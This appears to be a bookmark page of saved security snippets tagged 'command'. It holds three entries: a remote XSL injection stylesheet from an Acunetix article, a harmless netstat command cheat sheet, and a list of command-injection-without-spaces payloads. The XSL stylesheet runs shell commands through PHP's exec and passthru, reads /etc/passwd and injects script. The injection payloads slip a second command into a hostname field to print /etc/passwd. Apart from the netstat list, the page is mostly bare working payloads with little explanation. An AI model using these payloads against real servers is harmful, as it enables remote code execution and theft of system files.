9 results
tagged
command x
-
-
-
-
-
-
The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix
October 16, 2020 at 3:57:50 PM UTC * - permalink -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"> <xsl:template match="/"> <script>confirm("We're good");</script> <!-- <xsl:value-of select="php:function('exec','id')"/> <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/> <xsl:copy-of select="document('/etc/passwd')"/> <xsl:value-of select="php:function('passthru','ls -la /')"/> --> <xsl:value-of select="php:function('passthru','ls -la /')"/> </xsl:template> </xsl:stylesheet>- https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/
-
Netstat Commands - Network Administration Tutorial - HackerSploit
February 8, 2019 at 11:12:17 AM UTC - permalink -netstat -c–Continuous output
netstat -r–Displays routing table
netstat -ie–Network Interfaces
Displaying all Connections
netstat -a
Displaying all TCP
netstat -at
Displaying all UDP
netstat -au
Displaying all listening TCP Ports
netstat -lt
Displaying all listening UDP Ports
netstat -lu
Process Identification
netstat -p
netstat -atp–Shows service name
Displaying only listening TCP connections
netstat -tnl
Displaying only listening UDP connections
netstat -unl
Combination:netstat -nlpt–Shows process name and PID
Displaying a particular port
netstat -anp | grep:443- https://hsploit.com/netstat-tutorial/
-
Command Injection Without Spaces
December 10, 2018 at 4:43:56 PM UTC - permalink -{echo,hello,world}
CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20a\x20b\x20c'&&echo$CMD
google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD- https://www.betterhacker.com/2016/10/command-injection-without-spaces.html